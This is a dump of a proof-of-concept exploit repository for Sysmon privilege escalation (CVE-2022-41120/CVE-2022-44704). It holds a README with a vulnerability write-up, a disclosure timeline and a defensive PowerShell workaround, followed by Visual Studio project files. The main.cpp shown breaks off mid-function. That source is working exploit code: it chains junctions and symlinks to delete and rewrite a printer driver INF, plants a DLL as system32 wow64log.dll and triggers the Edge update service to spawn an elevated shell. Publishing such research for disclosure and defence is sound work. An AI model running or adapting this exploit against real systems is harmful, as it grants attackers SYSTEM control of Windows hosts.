Full Code of Wh04m1001/SysmonEoP for AI

Repository: Wh04m1001/SysmonEoP
Branch: main
Commit: a15e417b6252
Files: 29
Total size: 122.8 KB

Directory structure:
gitextract_zfsi2xfe/

├── README.md
├── v1/
│   ├── README.md
│   └── SysmonEoP/
│       ├── SysmonEOP.sln
│       ├── SysmonEOP.vcxproj
│       ├── SysmonEOP.vcxproj.filters
│       ├── SysmonEOP.vcxproj.user
│       ├── def.h
│       ├── main.cpp
│       ├── resource.aps
│       ├── resource.h
│       ├── resource.rc
│       ├── sysmon.idl
│       ├── sysmon_c.c
│       ├── sysmon_h.h
│       └── sysmon_s.c
└── v2/
    ├── README.md
    └── SysmonEoP/
        ├── SysmonEOP.sln
        ├── SysmonEOP.vcxproj
        ├── SysmonEOP.vcxproj.filters
        ├── SysmonEOP.vcxproj.user
        ├── def.h
        ├── main.cpp
        ├── resource.aps
        ├── resource.h
        ├── resource.rc
        ├── sysmon.idl
        ├── sysmon_c.c
        ├── sysmon_h.h
        └── sysmon_s.c

================================================
FILE CONTENTS
================================================

================================================
FILE: README.md
================================================
# SysmonEoP

Proof of Concept for arbitrary file delete/write in Sysmon (CVE-2022-41120/CVE-2022-44704)

# Vulnerability

The vulnerability is in the code responsible for the ClipboardChange event, which can be reached through RPC.
Local users can send data to the RPC server, which is then written to the C:\Sysmon directory (the default ArchiveDirectory) and deleted afterwards.
In versions before 14.11, Sysmon did not check whether the directory was created by a low-privileged user or whether it is a junction, which can be abused to perform arbitrary file delete/write (somewhat limited, as you can only write strings) in the context of the NT AUTHORITY\SYSTEM user.
In versions 14.11/14.12, after the initial fix, Sysmon checks whether the directory exists and refuses to write/delete files if it does.
This patch was bypassed by letting Sysmon create the C:\Sysmon directory first (using the CreateDirectory API) and opening a handle on it before SetFileSecurity is called to change the DACL on the C:\Sysmon directory.

# Exploitation

All testing was done on Windows 10.

In my PoC I chained the arbitrary file delete/write to first delete the setup information file of a printer driver and then write a modified .INF file (as the Spooler service is enabled by default and low-privileged users can re-install printer drivers on Windows clients).
Setup information files can be abused to perform all kinds of operations, such as service creation, registry modification, file copy, etc.
I chose to copy one of the default printer DLLs into c:\windows\system32 and set permissions on it so that low-privileged users can modify it; this is done using the CopyFiles directive (https://learn.microsoft.com/en-us/windows-hardware/drivers/install/inf-copyfiles-directive). Once the file is copied, it is overwritten with a DLL that spawns an elevated cmd.exe process.
It is also possible to abuse just the arbitrary file delete for LPE via Windows Installer behavior (a trick found by [@KLINIX5](https://twitter.com/KLINIX5) and documented by ZDI here: https://www.zerodayinitiative.com/blog/2022/3/16/abusing-arbitrary-file-deletes-to-escalate-privilege-and-other-great-tricks).

# Vulnerable versions and pre-requirements

All testing was done on versions 13.34-14.12.
I don't know exactly which is the lowest vulnerable version, but I believe versions 12.0 - 14.12 are vulnerable, as the ClipboardChange event was introduced in version 12.0.
In order to exploit this vulnerability, events that use the ArchiveDirectory must not be enabled (ClipboardChange and FileDelete, I believe), as if those two are in use the ArchiveDirectory will already have been created with secure permissions.

# Workaround

If you are using a vulnerable version and cannot update, you can create the ArchiveDirectory (C:\Sysmon by default) and set permissions that only allow access to the NT AUTHORITY\SYSTEM account.
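An added example (not code from the SysmonEoP repository) of applying this workaround from an elevated PowerShell session: it creates the default ArchiveDirectory C:\Sysmon if it is missing, refuses to proceed if a reparse point is already sitting at that path, restricts the DACL to NT AUTHORITY\SYSTEM and then verifies the result. The path is assumed to be the default; adjust $ArchiveDir if your Sysmon configuration sets a different ArchiveDirectory.

```powershell
# Added hardening example for the workaround above; it is not part of the SysmonEoP
# repository. Run from an elevated PowerShell session. It assumes the default
# ArchiveDirectory path (C:\Sysmon); adjust $ArchiveDir if your config sets another.
$ArchiveDir = 'C:\Sysmon'

# If the path already exists, make sure it is a plain directory and not a reparse
# point (junction/symlink): a pre-planted reparse point is exactly what the PoC relies on.
if (Test-Path -LiteralPath $ArchiveDir) {
    $item = Get-Item -LiteralPath $ArchiveDir -Force
    if (-not $item.PSIsContainer -or
        ($item.Attributes -band [IO.FileAttributes]::ReparsePoint)) {
        throw "$ArchiveDir exists but is not a plain directory; investigate and remove it first."
    }
} else {
    New-Item -ItemType Directory -Path $ArchiveDir | Out-Null
}

# Build a DACL that grants access only to NT AUTHORITY\SYSTEM.
$acl = Get-Acl -LiteralPath $ArchiveDir
$acl.SetAccessRuleProtection($true, $false)   # stop inheriting from C:\ and drop inherited ACEs
foreach ($rule in $acl.Access) {              # drop any explicit ACEs that were already there
    if (-not $rule.IsInherited) { [void]$acl.RemoveAccessRule($rule) }
}
$systemSid = New-Object System.Security.Principal.SecurityIdentifier(
    [System.Security.Principal.WellKnownSidType]::LocalSystemSid, $null)
$systemRule = New-Object System.Security.AccessControl.FileSystemAccessRule(
    $systemSid,
    [System.Security.AccessControl.FileSystemRights]::FullControl,
    ([System.Security.AccessControl.InheritanceFlags]::ContainerInherit -bor
     [System.Security.AccessControl.InheritanceFlags]::ObjectInherit),
    [System.Security.AccessControl.PropagationFlags]::None,
    [System.Security.AccessControl.AccessControlType]::Allow)
[void]$acl.AddAccessRule($systemRule)
Set-Acl -LiteralPath $ArchiveDir -AclObject $acl

# Verify the result: inheritance disabled and a single ACE, for SYSTEM only.
$check = Get-Acl -LiteralPath $ArchiveDir
$check.Access | Format-Table IdentityReference, FileSystemRights, AccessControlType, IsInherited -AutoSize
$onlySystem = $check.AreAccessRulesProtected -and $check.Access.Count -eq 1 -and
              $check.Access[0].IdentityReference.Value -eq 'NT AUTHORITY\SYSTEM'
if ($onlySystem) { "[+] $ArchiveDir is restricted to NT AUTHORITY\SYSTEM" }
else             { "[!] $ArchiveDir DACL is not as expected; review the table above" }
```

Updating to 14.13 or later remains the real fix; this only removes the low-privileged user's ability to pre-create or redirect the ArchiveDirectory.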

# Timeline

- 2022/06/13 - Vulnerability reported to Microsoft.
- 2022/06/16 - Vulnerability confirmed.
- 2022/11/08 - Patch and CVE released.
- 2022/11/08 - Bypass reported to Microsoft.
- 2022/11/11 - Microsoft cannot reproduce the vulnerability, asks for a different PoC.
- 2022/11/11 - I send the same PoC and suggest that Sysmon is either not installed on the testing VM or the installation was corrupted.
- 2022/11/15 - Microsoft confirmed the bypass.
- 2022/11/28 - Microsoft releases v14.13, which patches the vulnerability (CVE will be released in the December Patch Tuesday).

# Links & Resources
- https://itm4n.github.io/fuzzing-windows-rpc-rpcview/
- https://www.zerodayinitiative.com/blog/2022/3/16/abusing-arbitrary-file-deletes-to-escalate-privilege-and-other-great-tricks


================================================
FILE: v1/README.md
================================================
Exploit for versions before 14.11.

![PoC](poc.PNG)


================================================
FILE: v1/SysmonEoP/SysmonEOP.sln
================================================

Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio Version 16
VisualStudioVersion = 16.0.30717.126
MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "SysmonEOP", "SysmonEOP.vcxproj", "{FAC6A4F5-2E86-4EF0-A787-669B2A2F28AF}"
EndProject
Global
	GlobalSection(SolutionConfigurationPlatforms) = preSolution
		Debug|x64 = Debug|x64
		Debug|x86 = Debug|x86
		Release|x64 = Release|x64
		Release|x86 = Release|x86
	EndGlobalSection
	GlobalSection(ProjectConfigurationPlatforms) = postSolution
		{FAC6A4F5-2E86-4EF0-A787-669B2A2F28AF}.Debug|x64.ActiveCfg = Debug|x64
		{FAC6A4F5-2E86-4EF0-A787-669B2A2F28AF}.Debug|x64.Build.0 = Debug|x64
		{FAC6A4F5-2E86-4EF0-A787-669B2A2F28AF}.Debug|x86.ActiveCfg = Debug|Win32
		{FAC6A4F5-2E86-4EF0-A787-669B2A2F28AF}.Debug|x86.Build.0 = Debug|Win32
		{FAC6A4F5-2E86-4EF0-A787-669B2A2F28AF}.Release|x64.ActiveCfg = Release|x64
		{FAC6A4F5-2E86-4EF0-A787-669B2A2F28AF}.Release|x64.Build.0 = Release|x64
		{FAC6A4F5-2E86-4EF0-A787-669B2A2F28AF}.Release|x86.ActiveCfg = Release|Win32
		{FAC6A4F5-2E86-4EF0-A787-669B2A2F28AF}.Release|x86.Build.0 = Release|Win32
	EndGlobalSection
	GlobalSection(SolutionProperties) = preSolution
		HideSolutionNode = FALSE
	EndGlobalSection
	GlobalSection(ExtensibilityGlobals) = postSolution
		SolutionGuid = {EA809E7C-ABAC-45B5-BE5B-2F48BFC601DA}
	EndGlobalSection
EndGlobal


================================================
FILE: v1/SysmonEoP/SysmonEOP.vcxproj
================================================
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <ItemGroup Label="ProjectConfigurations">
    <ProjectConfiguration Include="Debug|Win32">
      <Configuration>Debug</Configuration>
      <Platform>Win32</Platform>
    </ProjectConfiguration>
    <ProjectConfiguration Include="Release|Win32">
      <Configuration>Release</Configuration>
      <Platform>Win32</Platform>
    </ProjectConfiguration>
    <ProjectConfiguration Include="Debug|x64">
      <Configuration>Debug</Configuration>
      <Platform>x64</Platform>
    </ProjectConfiguration>
    <ProjectConfiguration Include="Release|x64">
      <Configuration>Release</Configuration>
      <Platform>x64</Platform>
    </ProjectConfiguration>
  </ItemGroup>
  <PropertyGroup Label="Globals">
    <VCProjectVersion>16.0</VCProjectVersion>
    <Keyword>Win32Proj</Keyword>
    <ProjectGuid>{fac6a4f5-2e86-4ef0-a787-669b2a2f28af}</ProjectGuid>
    <RootNamespace>SysmonEOP</RootNamespace>
    <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
  </PropertyGroup>
  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
    <ConfigurationType>Application</ConfigurationType>
    <UseDebugLibraries>true</UseDebugLibraries>
    <PlatformToolset>v143</PlatformToolset>
    <CharacterSet>Unicode</CharacterSet>
  </PropertyGroup>
  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
    <ConfigurationType>Application</ConfigurationType>
    <UseDebugLibraries>false</UseDebugLibraries>
    <PlatformToolset>v143</PlatformToolset>
    <WholeProgramOptimization>true</WholeProgramOptimization>
    <CharacterSet>Unicode</CharacterSet>
  </PropertyGroup>
  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
    <ConfigurationType>Application</ConfigurationType>
    <UseDebugLibraries>true</UseDebugLibraries>
    <PlatformToolset>v143</PlatformToolset>
    <CharacterSet>Unicode</CharacterSet>
  </PropertyGroup>
  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
    <ConfigurationType>Application</ConfigurationType>
    <UseDebugLibraries>false</UseDebugLibraries>
    <PlatformToolset>v143</PlatformToolset>
    <WholeProgramOptimization>true</WholeProgramOptimization>
    <CharacterSet>Unicode</CharacterSet>
  </PropertyGroup>
  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
  <ImportGroup Label="ExtensionSettings">
  </ImportGroup>
  <ImportGroup Label="Shared">
  </ImportGroup>
  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
  </ImportGroup>
  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
  </ImportGroup>
  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
  </ImportGroup>
  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
  </ImportGroup>
  <PropertyGroup Label="UserMacros" />
  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
    <LinkIncremental>true</LinkIncremental>
  </PropertyGroup>
  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
    <LinkIncremental>false</LinkIncremental>
  </PropertyGroup>
  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
    <LinkIncremental>true</LinkIncremental>
  </PropertyGroup>
  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
    <LinkIncremental>false</LinkIncremental>
  </PropertyGroup>
  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
    <ClCompile>
      <WarningLevel>Level3</WarningLevel>
      <SDLCheck>true</SDLCheck>
      <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
      <ConformanceMode>true</ConformanceMode>
    </ClCompile>
    <Link>
      <SubSystem>Console</SubSystem>
      <GenerateDebugInformation>true</GenerateDebugInformation>
    </Link>
  </ItemDefinitionGroup>
  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
    <ClCompile>
      <WarningLevel>Level3</WarningLevel>
      <FunctionLevelLinking>true</FunctionLevelLinking>
      <IntrinsicFunctions>true</IntrinsicFunctions>
      <SDLCheck>true</SDLCheck>
      <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
      <ConformanceMode>true</ConformanceMode>
    </ClCompile>
    <Link>
      <SubSystem>Console</SubSystem>
      <EnableCOMDATFolding>true</EnableCOMDATFolding>
      <OptimizeReferences>true</OptimizeReferences>
      <GenerateDebugInformation>true</GenerateDebugInformation>
    </Link>
  </ItemDefinitionGroup>
  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
    <ClCompile>
      <WarningLevel>Level3</WarningLevel>
      <SDLCheck>true</SDLCheck>
      <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
      <ConformanceMode>true</ConformanceMode>
    </ClCompile>
    <Link>
      <SubSystem>Console</SubSystem>
      <GenerateDebugInformation>true</GenerateDebugInformation>
    </Link>
  </ItemDefinitionGroup>
  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
    <ClCompile>
      <WarningLevel>Level3</WarningLevel>
      <FunctionLevelLinking>true</FunctionLevelLinking>
      <IntrinsicFunctions>true</IntrinsicFunctions>
      <SDLCheck>true</SDLCheck>
      <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
      <ConformanceMode>true</ConformanceMode>
      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
      <ProgramDataBaseFileName />
    </ClCompile>
    <Link>
      <SubSystem>Console</SubSystem>
      <EnableCOMDATFolding>true</EnableCOMDATFolding>
      <OptimizeReferences>true</OptimizeReferences>
      <GenerateDebugInformation>true</GenerateDebugInformation>
    </Link>
    <BuildLog>
      <Path />
    </BuildLog>
  </ItemDefinitionGroup>
  <ItemGroup>
    <ClCompile Include="main.cpp" />
    <ClCompile Include="sysmon_c.c" />
  </ItemGroup>
  <ItemGroup>
    <Midl Include="sysmon.idl" />
  </ItemGroup>
  <ItemGroup>
    <ClInclude Include="def.h" />
    <ClInclude Include="resource.h" />
  </ItemGroup>
  <ItemGroup>
    <ResourceCompile Include="resource.rc" />
  </ItemGroup>
  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
  <ImportGroup Label="ExtensionTargets">
  </ImportGroup>
</Project>

================================================
FILE: v1/SysmonEoP/SysmonEOP.vcxproj.filters
================================================
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <ItemGroup>
    <Filter Include="Source Files">
      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
      <Extensions>cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
    </Filter>
    <Filter Include="Header Files">
      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
      <Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
    </Filter>
    <Filter Include="Resource Files">
      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
    </Filter>
  </ItemGroup>
  <ItemGroup>
    <ClCompile Include="main.cpp">
      <Filter>Source Files</Filter>
    </ClCompile>
    <ClCompile Include="sysmon_c.c">
      <Filter>Source Files</Filter>
    </ClCompile>
  </ItemGroup>
  <ItemGroup>
    <Midl Include="sysmon.idl">
      <Filter>Source Files</Filter>
    </Midl>
  </ItemGroup>
  <ItemGroup>
    <ClInclude Include="def.h">
      <Filter>Header Files</Filter>
    </ClInclude>
    <ClInclude Include="resource.h">
      <Filter>Header Files</Filter>
    </ClInclude>
  </ItemGroup>
  <ItemGroup>
    <ResourceCompile Include="resource.rc">
      <Filter>Resource Files</Filter>
    </ResourceCompile>
  </ItemGroup>
</Project>

================================================
FILE: v1/SysmonEoP/SysmonEOP.vcxproj.user
================================================
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <PropertyGroup />
</Project>

================================================
FILE: v1/SysmonEoP/def.h
================================================
#include <Windows.h>
#include <winternl.h>
#include <combaseapi.h>
#include <comdef.h>
#include <stdio.h>
#include <Wbemidl.h>
#include "sysmon_h.h"
#include "resource.h"


#pragma comment(lib, "wbemuuid.lib")
#pragma comment(lib,"RpcRT4.lib")
#pragma warning(disable:4996)

struct __declspec(uuid("A6B716CB-028B-404D-B72C-50E153DD68DA")) CLSID_MSEdge_Object;
class __declspec(uuid("79e0c401-b7bc-4de5-8104-71350f3a9b67")) IGoogleUpdate : IUnknown {
public:


    HRESULT CheckForUpdate(const WCHAR* guid, VOID* observer);
    HRESULT Update(const WCHAR* guid, VOID* observer);

};

//Variables
wchar_t object[] = L"Global\\GLOBALROOT\\RPC Control\\CLIP-876BEE15B64B610D2505A44596ED92FBA9624DB923F9D608698BD8C8E64E4F1A";
wchar_t sysmon[] = L"C:\\SYSMON";
HANDLE hFile, hFile2,hSysmon;

//Functions*
LPWSTR Find();
void load();
BOOL AddPrinterDriverWmi();
void Trigger(LPWSTR alpc);
LPWSTR  BuildPath(LPCWSTR path);
BOOL CreateJunction(HANDLE dir, LPCWSTR target);
BOOL DosDeviceSymLink(LPCWSTR object, LPCWSTR target);
BOOL DelDosDeviceSymLink(LPCWSTR object, LPCWSTR target);
BOOL DeleteJunction(HANDLE dir);


typedef struct _REPARSE_DATA_BUFFER {
    ULONG  ReparseTag;
    USHORT ReparseDataLength;
    USHORT Reserved;
    union {
        struct {
            USHORT SubstituteNameOffset;
            USHORT SubstituteNameLength;
            USHORT PrintNameOffset;
            USHORT PrintNameLength;
            ULONG  Flags;
            WCHAR  PathBuffer[1];
        } SymbolicLinkReparseBuffer;
        struct {
            USHORT SubstituteNameOffset;
            USHORT SubstituteNameLength;
            USHORT PrintNameOffset;
            USHORT PrintNameLength;
            WCHAR  PathBuffer[1];
        } MountPointReparseBuffer;
        struct {
            UCHAR DataBuffer[1];
        } GenericReparseBuffer;
    } DUMMYUNIONNAME;
} REPARSE_DATA_BUFFER, * PREPARSE_DATA_BUFFER;
typedef struct _OBJECT_DIRECTORY_INFORMATION {
    UNICODE_STRING Name;
    UNICODE_STRING TypeName;
} OBJECT_DIRECTORY_INFORMATION, * POBJECT_DIRECTORY_INFORMATION;
#define STATUS_MORE_ENTRIES 0x00000105
#define STATUS_NO_MORE_ENTRIES 0x8000001A
#define IO_REPARSE_TAG_MOUNT_POINT              (0xA0000003L)

typedef NTSYSAPI NTSTATUS(NTAPI* _NtCreateFile)(PHANDLE FileHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PIO_STATUS_BLOCK   IoStatusBlock, PLARGE_INTEGER AllocationSize, ULONG FileAttributes, ULONG ShareAccess, ULONG CreateDisposition, ULONG CreateOptions, PVOID EaBuffer, ULONG EaLength);
typedef NTSYSAPI VOID(NTAPI* _RtlInitUnicodeString)(PUNICODE_STRING DestinationString, PCWSTR SourceString);
typedef NTSYSAPI NTSTATUS(NTAPI* _NtOpenDirectoryObject)(OUT PHANDLE DirectoryHandle, IN ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes);
typedef NTSYSAPI NTSTATUS(NTAPI* _NtQueryDirectoryObject)(_In_      HANDLE  DirectoryHandle, _Out_opt_ PVOID   Buffer, _In_ ULONG Length, _In_ BOOLEAN ReturnSingleEntry, _In_  BOOLEAN RestartScan, _Inout_   PULONG  Context, _Out_opt_ PULONG  ReturnLength);
typedef NTSYSCALLAPI NTSTATUS(NTAPI* _NtSetInformationFile)(HANDLE  FileHandle,PIO_STATUS_BLOCK  IoStatusBlock,PVOID  FileInformation,ULONG  Length,ULONG FileInformationClass);

_RtlInitUnicodeString pRtlInitUnicodeString;
_NtCreateFile pNtCreateFile;
_NtSetInformationFile pNtSetInformationFile;
_NtQueryDirectoryObject pNtQueryDirectoryObject;
_NtOpenDirectoryObject pNtOpenDirectoryObect;

================================================
FILE: v1/SysmonEoP/main.cpp
================================================
#include "def.h"


int wmain(int argc, wchar_t* argv[])
{
    load();
    LPWSTR alpc = Find();
    HANDLE h1;
    if (alpc == NULL) {
        printf("[!] Failed to find ALPC port!\n");
        return 1;
    }

    if (!CreateDirectory(sysmon, NULL)) {
        printf("[!] Failed to create %ls directory!\n",sysmon);
        return 1;
    }
    hSysmon = CreateFile(sysmon, FILE_WRITE_ATTRIBUTES | DELETE, FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, NULL, OPEN_ALWAYS, FILE_FLAG_BACKUP_SEMANTICS | FILE_FLAG_OPEN_REPARSE_POINT|FILE_FLAG_DELETE_ON_CLOSE, NULL);
    if (hSysmon == INVALID_HANDLE_VALUE) {
        printf("[!] Failed to open handle on %ls directory!\n", sysmon);
        return 1;
    }
    DosDeviceSymLink(object, BuildPath(L"C:\\Windows\\System32\\DriverStore\\FileRepository\\prnge001.inf_amd64_1daeee8f3aa30fcb\\prnge001.inf"));
    CreateJunction(hSysmon, L"\\RPC Control");
   
    Trigger(alpc);
   
    do {
        h1 = CreateFile(L"C:\\Windows\\System32\\DriverStore\\FileRepository\\prnge001.inf_amd64_1daeee8f3aa30fcb\\prnge001.inf", GENERIC_READ, FILE_SHARE_READ|FILE_SHARE_DELETE|FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);
    } while (h1 != INVALID_HANDLE_VALUE);
    Sleep(500);
   
    printf("[+] Driver setup info file deleted!\n");
    CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Trigger, alpc, 0, NULL);
    do {
        h1 = CreateFile(L"C:\\Windows\\System32\\DriverStore\\FileRepository\\prnge001.inf_amd64_1daeee8f3aa30fcb\\prnge001.inf", GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);
    } while (h1 == INVALID_HANDLE_VALUE);
    HMODULE hm = GetModuleHandle(NULL);
    HRSRC res = FindResource(hm, MAKEINTRESOURCE(IDR_DLL1), L"dll");
    DWORD DllSize = SizeofResource(hm, res);
    void* DllBuff = LoadResource(hm, res);
    printf("[+] Driver setup info file written.\n");
    if (!AddPrinterDriverWmi()) {
        printf("[!] Failed to add print driver!\n");
        return 1;
    }
   
    HANDLE dll;
    do {
        Sleep(1000);
        dll = CreateFile(L"C:\\windows\\system32\\wow64log.dll", GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_DELETE | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);
    } while (dll == INVALID_HANDLE_VALUE);
    printf("[+] DLL created!\n");
    WriteFile(dll, DllBuff, DllSize, NULL, NULL);
    CloseHandle(dll);
    printf("[*] Triggering Edge Update service!\n");
    HRESULT coini = CoInitialize(NULL);
    IGoogleUpdate* updater = NULL;

    HRESULT hr = CoCreateInstance(__uuidof(CLSID_MSEdge_Object), NULL, CLSCTX_LOCAL_SERVER, __uuidof(updater), (PVOID*)&updater);
    
   
    DelDosDeviceSymLink(object, BuildPath(L"C:\\Windows\\System32\\DriverStore\\FileRepository\\prnge001.inf_amd64_1daeee8f3aa30fcb\\prnge001.inf"));
    DeleteJunction(hSysmon);
    while(!DeleteFile(L"C:\\windows\\system32\\wow64log.dll")){}
    return 0;
}



void load() {
    HMODULE ntdll = LoadLibraryW(L"ntdll.dll");
    if (ntdll != NULL) {
        pRtlInitUnicodeString = (_RtlInitUnicodeString)GetProcAddress(ntdll, "RtlInitUnicodeString");
        pNtCreateFile = (_NtCreateFile)GetProcAddress(ntdll, "NtCreateFile");
        pNtQueryDirectoryObject = (_NtQueryDirectoryObject)GetProcAddress(ntdll, "NtQueryDirectoryObject");
        pNtOpenDirectoryObect = (_NtOpenDirectoryObject)GetProcAddress(ntdll, "NtOpenDirectoryObject");
        pNtSetInformationFile = (_NtSetInformationFile)GetProcAddress(ntdll, "NtSetInformationFile");
    }
    if (pRtlInitUnicodeString == NULL || pNtCreateFile == NULL || pNtQueryDirectoryObject == NULL || pNtOpenDirectoryObect == NULL|| pNtSetInformationFile == NULL) {
        printf("Cannot load api's %d\n", GetLastError());
        exit(0);
    }

}



BOOL CreateJunction(HANDLE hDir, LPCWSTR target) {
    HANDLE hJunction;
    DWORD cb;
    wchar_t printname[] = L"";
    if (hDir == INVALID_HANDLE_VALUE) {
        printf("[!] HANDLE invalid!\n");
        return FALSE;
    }
    SIZE_T TargetLen = wcslen(target) * sizeof(WCHAR);
    SIZE_T PrintnameLen = wcslen(printname) * sizeof(WCHAR);
    SIZE_T PathLen = TargetLen + PrintnameLen + 12;
    SIZE_T Totalsize = PathLen + (DWORD)(FIELD_OFFSET(REPARSE_DATA_BUFFER, GenericReparseBuffer.DataBuffer));
    PREPARSE_DATA_BUFFER Data = (PREPARSE_DATA_BUFFER)malloc(Totalsize);
    Data->ReparseTag = IO_REPARSE_TAG_MOUNT_POINT;
    Data->ReparseDataLength = PathLen;
    Data->Reserved = 0;
    Data->MountPointReparseBuffer.SubstituteNameOffset = 0;
    Data->MountPointReparseBuffer.SubstituteNameLength = TargetLen;
    memcpy(Data->MountPointReparseBuffer.PathBuffer, target, TargetLen + 2);
    Data->MountPointReparseBuffer.PrintNameOffset = (USHORT)(TargetLen + 2);
    Data->MountPointReparseBuffer.PrintNameLength = (USHORT)PrintnameLen;
    memcpy(Data->MountPointReparseBuffer.PathBuffer + wcslen(target) + 1, printname, PrintnameLen + 2);
    WCHAR dir[MAX_PATH] = { 0x0 };
    if (DeviceIoControl(hDir, FSCTL_SET_REPARSE_POINT, Data, Totalsize, NULL, 0, &cb, NULL) != 0)
    {

        GetFinalPathNameByHandle(hDir, dir, MAX_PATH, 0);
        printf("[+] Junction %ls -> %ls created!\n", dir, target);
        free(Data);
        return TRUE;

    }
    else
    {

        printf("[!] Error: %d. Exiting\n", GetLastError());
        free(Data);
        return FALSE;
    }
}
BOOL DeleteJunction(HANDLE handle) {
    REPARSE_GUID_DATA_BUFFER buffer = { 0 };
    BOOL ret;
    buffer.ReparseTag = IO_REPARSE_TAG_MOUNT_POINT;
    DWORD cb = 0;
    IO_STATUS_BLOCK io;
    if (handle == INVALID_HANDLE_VALUE) {
        printf("[!] HANDLE invalid!\n");
        return FALSE;
    }
    WCHAR dir[MAX_PATH] = { 0x0 };
    if (DeviceIoControl(handle, FSCTL_DELETE_REPARSE_POINT, &buffer, REPARSE_GUID_DATA_BUFFER_HEADER_SIZE, NULL, NULL, &cb, NULL)) {
        GetFinalPathNameByHandle(handle, dir, MAX_PATH, 0);
        printf("[+] Junction %ls deleted!\n", dir);
        return TRUE;
    }
    else
    {
        printf("[!] Error: %d.\n", GetLastError());
        return FALSE;
    }
}

BOOL DosDeviceSymLink(LPCWSTR object, LPCWSTR target) {
    if (DefineDosDevice(DDD_NO_BROADCAST_SYSTEM | DDD_RAW_TARGET_PATH, object, target)) {
        printf("[+] Symlink %ls -> %ls created!\n", object, target);
        return TRUE;

    }
    else
    {
        printf("error :%d\n", GetLastError());
        return FALSE;

    }
}

BOOL DelDosDeviceSymLink(LPCWSTR object, LPCWSTR target) {
    if (DefineDosDevice(DDD_NO_BROADCAST_SYSTEM | DDD_RAW_TARGET_PATH | DDD_REMOVE_DEFINITION | DDD_EXACT_MATCH_ON_REMOVE, object, target)) {
        printf("[+] Symlink %ls -> %ls deleted!\n", object, target);
        return TRUE;

    }
    else
    {
        printf("error :%d\n", GetLastError());
        return FALSE;


    }
}

LPWSTR Find() {
    HANDLE rpccontrolobj;
    OBJECT_ATTRIBUTES obj;
    const wchar_t rpccontrol[] = L"\\RPC Control";
    UNICODE_STRING unicode_string = { 0 };
    pRtlInitUnicodeString(&unicode_string, rpccontrol);
